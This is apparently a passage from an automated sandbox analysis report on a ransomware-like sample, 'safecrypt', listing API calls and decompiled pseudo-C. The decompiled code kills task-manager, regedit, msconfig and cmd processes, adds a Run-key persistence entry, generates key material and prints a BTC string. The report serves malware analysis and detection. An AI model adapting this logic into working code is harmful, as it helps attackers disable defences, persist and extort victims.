                    • _memset.LIBCMT ref: 0040125D
                    • RegCreateKeyExW.ADVAPI32(80000003,\S-1-5-18\Software\xxxsys\,00000000,00000000,00000000,00020019,00000000,00000000,00000000), ref: 00401288
                    • RegCloseKey.ADVAPI32(00000000), ref: 00401338
                    • RegQueryValueExW.ADVAPI32(00000000,00439CC4,00000000,?,0043FED8,00000008), ref: 004012B0
                      • Part of subcall function 00401CD0: __strftime_l.LIBCMT ref: 00401CE2
                    • RegCreateKeyExW.ADVAPI32(80000001,Software\xxxsys\,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00401370
                    • RegQueryValueExW.ADVAPI32(00000000,00439D18,00000000,?,0043FED8,00000008), ref: 0040138A
                    • RegSetValueExW.ADVAPI32(00000000,00439D20,00000000,00000003,0043FED8,00000008), ref: 004013CA
                    • RegFlushKey.ADVAPI32(00000000), ref: 004013D4
                    • RegCloseKey.ADVAPI32(00000000), ref: 00401458
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: Value$CloseCreateQuery$Flush__strftime_l_memset
                    • String ID: %X%X%X%X$%X%X%X%X$%X%X%X%X$%X%X%X%X$Software\xxxsys\$\S-1-5-18\Software\xxxsys\
                    • API String ID: 2863423904-2924439399
                    • Opcode ID: 57819c60c14c9d028597cadfd946e3bf5887630331c3c6c438a2d4c18a095d66
                    • Instruction ID: 91a5836e0009545f61df0b28bfa59c004fde0f0611852c5e41a4c3c5fb11829f
                    • Opcode Fuzzy Hash: 57819c60c14c9d028597cadfd946e3bf5887630331c3c6c438a2d4c18a095d66
                    • Instruction Fuzzy Hash: 9351E771B542547EE71497A5EC43FBE3BB89B48B01F10503AB540A65F2D6F89A088B6C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 63%
                    			E00420259() {
                    				void* _t22;
                    				unsigned int _t28;
                    				intOrPtr* _t31;
                    				intOrPtr* _t33;
                    				intOrPtr* _t36;
                    				wchar_t* _t41;
                    				intOrPtr* _t42;
                    				wchar_t* _t44;
                    				wchar_t* _t46;
                    				wchar_t* _t47;
                    				wchar_t* _t48;
                    				void* _t49;
                    				signed int _t50;
                    				intOrPtr _t54;
                    				void* _t59;
                    				void* _t60;
                    				intOrPtr _t61;
                    				void* _t62;
                    				signed int _t63;
                    				void* _t65;
                    				void* _t68;
                    				void* _t69;
                    
                    				do {
                    					_t57 = _t63 - 0x15890;
                    					_t22 = _t63 - 0x15884;
                    					__imp__EnumProcesses(_t22, 0x9c40, _t63 - 0x15890);
                    					if(_t22 != 0) {
                    						_t28 =  *(_t63 - 0x15890) >> 2;
                    						_t50 = 0;
                    						 *(_t63 - 0x15888) = _t28;
                    						if(_t28 != 0) {
                    							do {
                    								_t61 =  *((intOrPtr*)(_t63 + _t50 * 4 - 0x15884));
                    								if(_t61 !=  *((intOrPtr*)(_t63 - 0x1588c)) && _t61 != 0) {
                    									_t31 = E00412FC0(_t57, 0, 1, 0x99a4299d);
                    									_t68 = _t65 + 0xc;
                    									_t62 =  *_t31(0x2000030, 0, _t61);
                    									if(_t62 == 0) {
                    										L16:
                    										_t33 = E00412FC0(_t57, 0, 1, 0x723eb0d5);
                    										_t65 = _t68 + 0xc;
                    										 *_t33(_t62);
                    									} else {
                    										E0042C770(_t63 - 0x2004, 0, 0x2000);
                    										_t65 = _t68 + 0xc;
                    										__imp__GetProcessImageFileNameW(_t62, _t63 - 0x2004, 0x1000);
                    										_t36 = _t63 - 0x2004;
                    										_t57 = _t36 + 2;
                    										do {
                    											_t54 =  *_t36;
                    											_t36 = _t36 + 2;
                    										} while (_t54 != 0);
                    										if(_t36 != _t57) {
                    											E00426123(_t63 - 0x2004, 0x1000);
                    											_t41 = wcsstr(_t63 - 0x2004, L"askmg");
                    											_t69 = _t65 + 0x10;
                    											if(_t41 != 0) {
                    												L15:
                    												_t42 = E00412FC0(_t57, 0, 1, 0x9e6fa842);
                    												_t68 = _t69 + 0xc;
                    												 *_t42(_t62, 0);
                    											} else {
                    												_t57 = _t63 - 0x2004;
                    												_t44 = wcsstr(_t63 - 0x2004, L"rocex");
                    												_t69 = _t69 + 8;
                    												if(_t44 != 0) {
                    													goto L15;
                    												} else {
                    													_t46 = wcsstr(_t63 - 0x2004, L"egedi");
                    													_t69 = _t69 + 8;
                    													if(_t46 != 0) {
                    														goto L15;
                    													} else {
                    														_t47 = wcsstr(_t63 - 0x2004, L"sconfi");
                    														_t69 = _t69 + 8;
                    														if(_t47 != 0) {
                    															goto L15;
                    														} else {
                    															_t57 = _t63 - 0x2004;
                    															_t48 = wcsstr(_t63 - 0x2004, L"cmd");
                    															_t68 = _t69 + 8;
                    															if(_t48 != 0) {
                    																goto L15;
                    															}
                    														}
                    													}
                    												}
                    											}
                    											goto L16;
                    										}
                    									}
                    									_t28 =  *(_t63 - 0x15888);
                    								}
                    								_t50 = _t50 + 1;
                    							} while (_t50 < _t28);
                    						}
                    						E0042C770(_t63 - 0x15884, 0, 0x13880);
                    						_t65 = _t65 + 0xc;
                    						Sleep(0xc8);
                    					}
                    				} while ( *0x46844c != 0);
                    				_pop(_t59);
                    				_pop(_t60);
                    				_pop(_t49);
                    				 *((intOrPtr*)(E00412FC0(_t57, 0, 1, 0x768aa260)))();
                    				return E004256D3(1, _t49,  *(_t63 - 4) ^ _t63, _t57, _t59, _t60, 0xffffffff);
                    			}

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: wcsstr$_memset$EnumFileImageNameProcessProcessesSleep
                    • String ID: askmg$cmd$egedi$rocex$sconfi
                    • API String ID: 1446188304-3583037101
                    • Opcode ID: f1c407ff159e8a700117d7c0813d5071be27f3a1718e6d55f9e880d821de5728
                    • Instruction ID: b3e6ca3c90dc883fdd534c025afea24800ae4c21be9fa86acf268e30b0fbfea0
                    • Opcode Fuzzy Hash: f1c407ff159e8a700117d7c0813d5071be27f3a1718e6d55f9e880d821de5728
                    • Instruction Fuzzy Hash: 69410031B403246BEB24E754AD86FDE73A4DF44705F840155FE08FA182EBB49754CA69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E0041FFF0(void* __eflags) {
                    				void* _v8;
                    				void* _v12;
                    				void* _v16;
                    				char _v20;
                    				intOrPtr* _t27;
                    				intOrPtr* _t29;
                    				intOrPtr* _t32;
                    				intOrPtr* _t35;
                    				intOrPtr* _t37;
                    				intOrPtr* _t39;
                    				intOrPtr* _t42;
                    				intOrPtr* _t46;
                    				void* _t51;
                    				void* _t54;
                    				intOrPtr _t57;
                    				intOrPtr _t59;
                    
                    				_v20 = 1;
                    				RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 0, 0, 0x20006, 0,  &_v8, 0);
                    				RegSetValueExW(_v8, L"EnableLinkedConnections", 0, 4,  &_v20, 4);
                    				RegFlushKey(_v8);
                    				RegCloseKey(_v8);
                    				_t27 = E00412FC0(_v8, 0, 2, 0x90a097e6);
                    				 *_t27(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0, 0, 0x20006, 0,  &_v12, 0);
                    				_t29 = 0x46a450;
                    				_t8 = _t29 + 2; // 0x46a452
                    				_t51 = _t8;
                    				do {
                    					_t57 =  *_t29;
                    					_t29 = _t29 + 2;
                    				} while (_t57 != 0);
                    				_t63 = _t29 - _t51 >> 1;
                    				_t32 = E00412FC0(_t57, 0, 2, 0x3e400fc0);
                    				_t11 = _t63 + 2; // 0x46a450
                    				 *_t32(_v12, L"gatert-12010", 0, 1, 0x46a450, (_t29 - _t51 >> 1) + _t11);
                    				RegFlushKey(_v12);
                    				_t35 = E00412FC0(_v12, 0, 2, 0xdb355534);
                    				 *_t35(_v12);
                    				_t37 = E00412FC0(_v12, 0, 2, 0x90a097e6);
                    				 *_t37(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0, 0, 0x20006, 0,  &_v16, 0);
                    				_t39 = 0x46a450;
                    				_t15 = _t39 + 2; // 0x46a452
                    				_t54 = _t15;
                    				do {
                    					_t59 =  *_t39;
                    					_t39 = _t39 + 2;
                    				} while (_t59 != 0);
                    				_t65 = _t39 - _t54 >> 1;
                    				_t42 = E00412FC0(_t59, 0, 2, 0x3e400fc0);
                    				_t18 = _t65 + 2; // 0x46a450
                    				 *_t42(_v16, L"gatert-12010", 0, 1, 0x46a450, (_t39 - _t54 >> 1) + _t18);
                    				RegFlushKey(_v16);
                    				_t46 = E00412FC0((_t39 - _t54 >> 1) + _t18, 0, 2, 0xdb355534);
                    				return  *_t46(_v16);
                    			}

                    APIs
                    • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00000000,00000000,00020006,00000000,0041F729,00000000,00000000,74A33620,00000000), ref: 0042001D
                    • RegSetValueExW.ADVAPI32(0041F729,EnableLinkedConnections,00000000,00000004,00000001,00000004), ref: 00420036
                    • RegFlushKey.ADVAPI32(0041F729), ref: 00420046
                    • RegCloseKey.ADVAPI32(0041F729), ref: 0042004C
                    • RegFlushKey.ADVAPI32(?), ref: 004200CF
                    • RegFlushKey.ADVAPI32(?), ref: 0042015F
                    Strings
                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0042000C
                    • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00420076, 0042010C
                    • gatert-12010, xrefs: 004200C3
                    • gatert-12010, xrefs: 00420153
                    • EnableLinkedConnections, xrefs: 00420030
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: Flush$CloseCreateValue
                    • String ID: EnableLinkedConnections$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$Software\Microsoft\Windows\CurrentVersion\Run$gatert-12010$gatert-12010
                    • API String ID: 1451706473-3431533434
                    • Opcode ID: 161738bfa41ea56bcd5f46244bf984c9d286cf3c846f1356024557cdb05744d8
                    • Instruction ID: 3362476b776491872f7b0fbb4da00e220a0f73d4176ee15283fe3825042f1d3c
                    • Opcode Fuzzy Hash: 161738bfa41ea56bcd5f46244bf984c9d286cf3c846f1356024557cdb05744d8
                    • Instruction Fuzzy Hash: 2241C576B803047BE620EBD09C47FAE77749B58B08F504459F704BB1C2DAF57A1186A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _memset.LIBCMT ref: 004010E5
                    • _memset.LIBCMT ref: 004010FC
                    • _memset.LIBCMT ref: 0040110D
                      • Part of subcall function 00401CB0: __strftime_l.LIBCMT ref: 00401CC5
                    • _strcpy_s.LIBCMT ref: 00401151
                    • _strcat_s.LIBCMT ref: 00401169
                    • RegCreateKeyExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 004011B7
                    • RegQueryValueExA.ADVAPI32(?,data,00000000,?,0043FF10,00000100), ref: 004011DF
                    • RegCloseKey.ADVAPI32(?), ref: 004011EE
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$CloseCreateQueryValue__strftime_l_strcat_s_strcpy_s
                    • String ID: S-1-5-18\$Software\%S$data
                    • API String ID: 714010904-975203091
                    • Opcode ID: 7dda3b27990d4d8410281548369a73bd25a6ac75461646f22318cc9e1a34e1df
                    • Instruction ID: dc76a17ff71e8bd2378e309a20fbe614cd44fff18883e3855bfd8d25dd6d1dfb
                    • Opcode Fuzzy Hash: 7dda3b27990d4d8410281548369a73bd25a6ac75461646f22318cc9e1a34e1df
                    • Instruction Fuzzy Hash: EF31C675B443186BEB24D750DC86FE97378AB58B00F5041DAB789BA0C1DAF42AC48F99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 45%
                    			E004014F0() {
                    				signed int _v8;
                    				char _v12;
                    				intOrPtr _v15;
                    				intOrPtr _v16;
                    				intOrPtr _v19;
                    				intOrPtr _v20;
                    				intOrPtr _v23;
                    				intOrPtr _v24;
                    				intOrPtr _v27;
                    				intOrPtr _v28;
                    				char _v31;
                    				char _v32;
                    				intOrPtr _v39;
                    				intOrPtr _v40;
                    				intOrPtr _v43;
                    				intOrPtr _v44;
                    				intOrPtr _v47;
                    				intOrPtr _v48;
                    				intOrPtr _v51;
                    				intOrPtr _v52;
                    				intOrPtr _v55;
                    				intOrPtr _v56;
                    				intOrPtr _v59;
                    				intOrPtr _v60;
                    				intOrPtr _v63;
                    				intOrPtr _v64;
                    				intOrPtr _v67;
                    				char _v68;
                    				intOrPtr _v75;
                    				intOrPtr _v79;
                    				intOrPtr _v83;
                    				intOrPtr _v87;
                    				intOrPtr _v91;
                    				intOrPtr _v95;
                    				intOrPtr _v99;
                    				intOrPtr _v103;
                    				char _v104;
                    				intOrPtr _v111;
                    				intOrPtr _v115;
                    				intOrPtr _v119;
                    				intOrPtr _v123;
                    				intOrPtr _v127;
                    				intOrPtr _v131;
                    				intOrPtr _v135;
                    				intOrPtr _v139;
                    				char _v140;
                    				intOrPtr _v191;
                    				char _v192;
                    				intOrPtr _v196;
                    				intOrPtr _v200;
                    				intOrPtr _v204;
                    				intOrPtr _v208;
                    				char _v211;
                    				char _v212;
                    				char _v283;
                    				char _v284;
                    				intOrPtr _v364;
                    				intOrPtr _v368;
                    				intOrPtr _v372;
                    				intOrPtr _v376;
                    				char _v380;
                    				char _v384;
                    				char _v388;
                    				intOrPtr _v392;
                    				char _v396;
                    				intOrPtr* _v400;
                    				intOrPtr _v404;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t135;
                    				signed char** _t141;
                    				intOrPtr* _t142;
                    				intOrPtr* _t149;
                    				signed char** _t155;
                    				signed char* _t157;
                    				signed char** _t160;
                    				signed char* _t162;
                    				void* _t164;
                    				intOrPtr* _t167;
                    				intOrPtr* _t187;
                    				intOrPtr* _t195;
                    				intOrPtr* _t196;
                    				intOrPtr* _t198;
                    				signed char** _t208;
                    				signed char _t213;
                    				signed char _t214;
                    				signed char _t216;
                    				signed char _t217;
                    				signed char** _t238;
                    				signed char** _t243;
                    				intOrPtr _t253;
                    				intOrPtr* _t257;
                    				char _t258;
                    				intOrPtr* _t259;
                    				void* _t260;
                    				intOrPtr* _t261;
                    				signed int _t264;
                    				void* _t265;
                    				void* _t270;
                    				void* _t272;
                    				void* _t273;
                    				void* _t274;
                    				void* _t275;
                    				void* _t277;
                    
                    				_t135 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t135 ^ _t264;
                    				 *0x43fed4 = 1;
                    				_v68 = 0;
                    				_v67 = 0;
                    				_v63 = 0;
                    				_v59 = 0;
                    				_v55 = 0;
                    				_v51 = 0;
                    				_v47 = 0;
                    				_v43 = 0;
                    				_v39 = 0;
                    				_t253 = E0040BB10();
                    				_v404 = _t253;
                    				_v396 = E0040D520();
                    				_v392 = E0040D520();
                    				_t141 =  *0x43f528; // 0x0
                    				_t142 = E00419760(_t141);
                    				_t208 =  *0x43f528; // 0x0
                    				_v400 = _t142;
                    				_t257 = E00419760(_t208);
                    				_v104 = 0;
                    				_v103 = 0;
                    				_v99 = 0;
                    				_v95 = 0;
                    				_v91 = 0;
                    				_v87 = 0;
                    				_v83 = 0;
                    				_v79 = 0;
                    				_v75 = 0;
                    				_v140 = 0;
                    				_v139 = 0;
                    				_v135 = 0;
                    				_v131 = 0;
                    				_v127 = 0;
                    				_v123 = 0;
                    				_v119 = 0;
                    				_v115 = 0;
                    				_v111 = 0;
                    				_v32 = 0;
                    				_v31 = 0;
                    				_v27 = 0;
                    				_v23 = 0;
                    				_v19 = 0;
                    				_v15 = 0;
                    				E0042C770( &_v211, 0, 0x40);
                    				_v284 = 0;
                    				E0042C770( &_v283, 0, 0x40);
                    				E0042C770(0x43ff10, 0, 0x100);
                    				_t270 = _t265 + 0x2c;
                    				goto L1;
                    				L3:
                    				_t149 =  *((intOrPtr*)( *0x460aa8 + 4));
                    				if(_t149 != 0) {
                    					 *_t149( &_v68, 0x20);
                    					_t270 = _t270 + 8;
                    				}
                    				if(E00401C10( &_v68) == 0) {
                    					L1:
                    					if( *0x460aa8 == 0) {
                    						 *0x460aa8 = 0x43e45c;
                    					}
                    					goto L3;
                    				} else {
                    					E00420970(0,  &_v68,  &_v104, 0x20);
                    					E0040D860(_v392,  &_v104,  &_v104, 0x20);
                    					_t155 =  *0x43f528; // 0x0
                    					_t272 = _t270 + 0xc;
                    					_v388 = 0;
                    					_v384 = 0;
                    					_t213 = ( *_t155)[0x78];
                    					_push(_t253);
                    					_push( &_v384);
                    					if(_t213 != 0) {
                    						 *_t213(_t155, _t257, _v392, 0,  &_v388);
                    					} else {
                    						_push( &_v388);
                    						_push(0);
                    						_push(_v392);
                    						_push(_t257);
                    						_push(_t155);
                    						E00419F60();
                    					}
                    					_t238 =  *0x43f528; // 0x0
                    					_t157 =  *_t238;
                    					_t214 = _t157[0x50];
                    					_t273 = _t272 + 0x1c;
                    					if(_t214 != 0 || ( *_t157 & 0x00000001) != 0) {
                    						if(_t157 ==  *_t257) {
                    							if(( *_t157 & 0x00000001) == 0) {
                    								 *_t214(_t238, _t257, 4, 0x43ffc0, 0x41, _t253);
                    								_t273 = _t273 + 0x18;
                    							} else {
                    								if(_t157[4] == 0x196) {
                    									E00415650(0x41, _t238, _t257, 0x43ffc0, _t253);
                    									_t273 = _t273 + 0x10;
                    								}
                    							}
                    						}
                    					}
                    					if(_t257 != 0) {
                    						_t195 =  *((intOrPtr*)( *_t257 + 0x2c));
                    						if(_t195 != 0) {
                    							 *_t195(_t257);
                    							_t273 = _t273 + 4;
                    						}
                    						_t196 =  *0x48048c;
                    						if(_t196 != 0) {
                    							 *_t196(_t257, 0);
                    							_t273 = _t273 + 8;
                    						}
                    						 *0x43def4(_t257);
                    						_t198 =  *0x48048c;
                    						_t273 = _t273 + 4;
                    						if(_t198 != 0) {
                    							 *_t198(0, 1);
                    							_t273 = _t273 + 8;
                    						}
                    					}
                    					_t258 = _v396;
                    					E0040D860(_t258, _t238,  &_v68, 0x20);
                    					_t160 =  *0x43f528; // 0x0
                    					_v384 = 0;
                    					_v388 = 0;
                    					_t216 = ( *_t160)[0x78];
                    					_t274 = _t273 + 8;
                    					_push(_t253);
                    					if(_t216 != 0) {
                    						 *_t216(_t160, _v400, _t258, 0,  &_v384,  &_v388);
                    						_t259 = _v400;
                    					} else {
                    						_push( &_v388);
                    						_push( &_v384);
                    						_push(0);
                    						_push(_t258);
                    						_t259 = _v400;
                    						_push(_t259);
                    						_push(_t160);
                    						E00419F60();
                    					}
                    					_t243 =  *0x43f528; // 0x0
                    					_t162 =  *_t243;
                    					_t217 = _t162[0x50];
                    					_t275 = _t274 + 0x1c;
                    					if(_t217 != 0 || ( *_t162 & 0x00000001) != 0) {
                    						if(_t162 ==  *_t259) {
                    							if(( *_t162 & 0x00000001) == 0) {
                    								 *_t217(_t243, _t259, 4,  &_v284, 0x41, _t253);
                    								_t275 = _t275 + 0x18;
                    							} else {
                    								if(_t162[4] == 0x196) {
                    									E00415650(0x41, _t243, _t259,  &_v284, _t253);
                    									_t275 = _t275 + 0x10;
                    								}
                    							}
                    						}
                    					}
                    					_t260 = E00414960( &_v68, _t243);
                    					_t164 = memcpy(0x43ff40, _t260, 0x18 << 2);
                    					_t256 = _t260 + 0x30;
                    					asm("movsb");
                    					E004258B8(_t164);
                    					_t261 = _v396;
                    					_t277 = _t275 + 0x10;
                    					_v68 = 0;
                    					_v64 = 0;
                    					_v60 = 0;
                    					_v56 = 0;
                    					_v52 = 0;
                    					_v48 = 0;
                    					_v44 = 0;
                    					_v40 = 0;
                    					if( *((intOrPtr*)(_t261 + 8)) < 1) {
                    						_t256 = _t261;
                    						_t167 = E0040D690(_t261, 1);
                    						_t277 = _t277 + 4;
                    					} else {
                    						_t167 = _t261;
                    					}
                    					_t307 = _t167;
                    					if(_t167 != 0) {
                    						_t187 =  *_t261;
                    						 *((intOrPtr*)(_t261 + 0xc)) = 0;
                    						 *_t187 = 0;
                    						 *((intOrPtr*)(_t187 + 4)) = 0;
                    						 *((intOrPtr*)(_t261 + 4)) = 0;
                    					}
                    					E0040D490(_t261);
                    					E0040D490(_v392);
                    					E00420970(0,  &_v284,  &_v104, 0x41);
                    					E0042C770( &_v380, 0, 0x60);
                    					_v380 = 0x67452301;
                    					_v376 = 0xefcdab89;
                    					_v372 = 0x98badcfe;
                    					_v368 = 0x10325476;
                    					_v364 = 0xc3d2e1f0;
                    					E0041D2F0( &_v380,  &_v380,  &_v104);
                    					E0041D3D0( &_v31,  &_v380);
                    					E00420970(0,  &_v32,  &_v104, 0x15);
                    					E00420970(0,  &_v104,  &_v140, 0x20);
                    					_v208 = _v28;
                    					_v204 = _v24;
                    					_v196 = _v16;
                    					_v212 = _v32;
                    					_t250 =  &_v212;
                    					_v192 = _v12;
                    					_v200 = _v20;
                    					_v191 = _v140;
                    					_v396 = 0x30;
                    					E00401AB0(0x43ff10,  &_v396,  &_v212);
                    					_push(0x43ff10);
                    					E00425986(0,  &_v212, _t256, _v392, _t307);
                    					E00425DBB(_v140,  &_v212, _t307, 0x440008);
                    					return E004256D3(E0040BBA0(_t256, _v404), 0, _v8 ^ _t264, _t250, _t256, _v404, "BTC     %s\n");
                    				}
                    			}

                    APIs
                    • _memset.LIBCMT ref: 004015D4
                    • _memset.LIBCMT ref: 004015EC
                    • _memset.LIBCMT ref: 004015FF
                    • _free.LIBCMT ref: 0040181A
                    • _memset.LIBCMT ref: 00401896
                      • Part of subcall function 00420970: _memset.LIBCMT ref: 0042099C
                      • Part of subcall function 00401AB0: _malloc.LIBCMT ref: 00401B20
                      • Part of subcall function 00401AB0: _memset.LIBCMT ref: 00401B2B
                    • _wprintf.LIBCMT ref: 00401988
                    • __time64.LIBCMT ref: 00401992
                      • Part of subcall function 00425DBB: GetSystemTimeAsFileTime.KERNEL32(00411657,?,?,?,00411657,?,00000000,00418C28,?,?,004117A9,00000000,000000FF,CCCCC35B,004118DB), ref: 00425DC6
                      • Part of subcall function 00425DBB: __aulldiv.LIBCMT ref: 00425DE6
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Similarity
                    • API ID: _memset$Time$FileSystem__aulldiv__time64_free_malloc_wprintf
                    • String ID: 0$BTC %s
                    • API String ID: 2366515660-1076587282
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00420560(intOrPtr* __eax) {
                    				struct HDC__* _v8;
                    				void* _v12;
                    				void* _v16;
                    				void* _v20;
                    				void* _v24;
                    				char _v28;
                    				void* __edi;
                    				void* __esi;
                    				void* _t32;
                    				struct HDC__* _t35;
                    				struct HDC__* _t36;
                    				intOrPtr* _t37;
                    
                    				_t37 = __eax;
                    				_t35 = GetDC(0);
                    				 *_t37 = 0;
                    				 *((intOrPtr*)(_t37 + 4)) = 0;
                    				 *(_t37 + 8) = 0x47e;
                    				_v8 = _t35;
                    				_v24 = 0;
                    				_v20 = 0;
                    				_v16 = 0;
                    				_v12 = 0;
                    				 *(_t37 + 0xc) = 0x3e8;
                    				_t32 = CreateCompatibleBitmap(_t35, 0x47e, 0x3e8);
                    				if(_t32 != 0) {
                    					_t36 = CreateCompatibleDC(_t35);
                    					if(_t36 != 0) {
                    						_v12 = SelectObject(_t36, _t32);
                    						SetBkMode(_t36, 1);
                    						SetTextColor(_t36, 0xffffff);
                    						E00420180(_t36,  &_v28);
                    						SelectObject(_t36, _v12);
                    						DeleteDC(_t36);
                    						_v12 = 1;
                    					}
                    					_t35 = _v8;
                    				}
                    				ReleaseDC(0, _t35);
                    				if(_v12 != 0 || _t32 == 0) {
                    					return _t32;
                    				} else {
                    					DeleteObject(_t32);
                    					return 0;
                    				}
                    			}

                    APIs
                    • GetDC.USER32(00000000), ref: 0042056D
                    • CreateCompatibleBitmap.GDI32(00000000,0000047E,000003E8), ref: 004205A0
                    • CreateCompatibleDC.GDI32(00000000), ref: 004205AD
                    • SelectObject.GDI32(00000000,00000000), ref: 004205BB
                    • SetBkMode.GDI32(00000000,00000001), ref: 004205C7
                    • SetTextColor.GDI32(00000000,00FFFFFF), ref: 004205D3
                      • Part of subcall function 00420180: CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma,00000000,004205E1), ref: 004201A3
                      • Part of subcall function 00420180: SelectObject.GDI32(00000000,00000000), ref: 004201AD
                      • Part of subcall function 00420180: DrawTextA.USER32(00000000,00460B30,000000FF,?,00000400), ref: 004201CE
                      • Part of subcall function 00420180: DrawTextA.USER32(00000000,00460B30,000000FF,?,00000010), ref: 004201DF
                      • Part of subcall function 00420180: GetStockObject.GDI32(0000000D), ref: 004201E7
                      • Part of subcall function 00420180: SelectObject.GDI32(00000000,00000000), ref: 004201EF
                      • Part of subcall function 00420180: DeleteObject.GDI32(00000000), ref: 004201F6
                    • SelectObject.GDI32(00000000,?), ref: 004205E6
                    • DeleteDC.GDI32(00000000), ref: 004205ED
                    • ReleaseDC.USER32 ref: 00420600
                    • DeleteObject.GDI32(00000000), ref: 00420611
                    Similarity
                    • API ID: Object$Select$CreateDeleteText$CompatibleDraw$BitmapColorFontModeReleaseStock
                    • API String ID: 1917954226-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00420180(struct HDC__* __edi, struct tagRECT* __esi) {
                    				void* _t10;
                    
                    				_t10 = CreateFontW(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 1, 0, 0, 0, 0x20, L"Tahoma");
                    				SelectObject(__edi, _t10);
                    				 *__esi = 0xa;
                    				__esi->top = 0xa;
                    				DrawTextA(__edi, 0x460b30, 0xffffffff, __esi, 0x400);
                    				DrawTextA(__edi, 0x460b30, 0xffffffff, __esi, 0x10);
                    				SelectObject(__edi, GetStockObject(0xd));
                    				DeleteObject(_t10);
                    				return __esi;
                    			}

                    APIs
                    • CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma,00000000,004205E1), ref: 004201A3
                    • SelectObject.GDI32(00000000,00000000), ref: 004201AD
                    • DrawTextA.USER32(00000000,00460B30,000000FF,?,00000400), ref: 004201CE
                    • DrawTextA.USER32(00000000,00460B30,000000FF,?,00000010), ref: 004201DF
                    • GetStockObject.GDI32(0000000D), ref: 004201E7
                    • SelectObject.GDI32(00000000,00000000), ref: 004201EF
                    • DeleteObject.GDI32(00000000), ref: 004201F6
                    Similarity
                    • API ID: Object$DrawSelectText$CreateDeleteFontStock
                    • String ID: Tahoma
                    • API String ID: 176621763-3580928618
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00401000(void* __ebx, void* __edi, void* __esi) {
                    				signed int _v8;
                    				char _v262;
                    				short _v264;
                    				void* _v268;
                    				signed int _t11;
                    				signed int _t34;
                    
                    				_t11 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t11 ^ _t34;
                    				_v264 = 0;
                    				E0042C770( &_v262, 0, 0xfe);
                    				E00401C90(0x80,  &_v264, L"Software\\%s", 0x43fee0);
                    				RegCreateKeyExW(0x80000001,  &_v264, 0, 0, 0, 0x20006, 0,  &_v268, 0);
                    				RegSetValueExW(_v268, L"data", 0, 3, 0x43ff10, 0x100);
                    				RegFlushKey(_v268);
                    				return E004256D3(RegCloseKey(_v268), __ebx, _v8 ^ _t34, _v268, __edi, __esi);
                    			}

                    APIs
                    • _memset.LIBCMT ref: 00401029
                      • Part of subcall function 00401C90: __strftime_l.LIBCMT ref: 00401CA5
                    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0040106E
                    • RegSetValueExW.ADVAPI32(?,data,00000000,00000003,0043FF10,00000100), ref: 0040108E
                    • RegFlushKey.ADVAPI32(?), ref: 0040109B
                    • RegCloseKey.ADVAPI32(?), ref: 004010A8
                    Similarity
                    • API ID: CloseCreateFlushValue__strftime_l_memset
                    • String ID: Software\%s$data
                    • API String ID: 664986230-2588080539
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 45%
                    			E0041F2F0() {
                    				void* _v8;
                    				void* _v12;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t16;
                    				signed int _t17;
                    				intOrPtr* _t19;
                    				signed int _t21;
                    				void* _t22;
                    				signed int _t27;
                    				char* _t31;
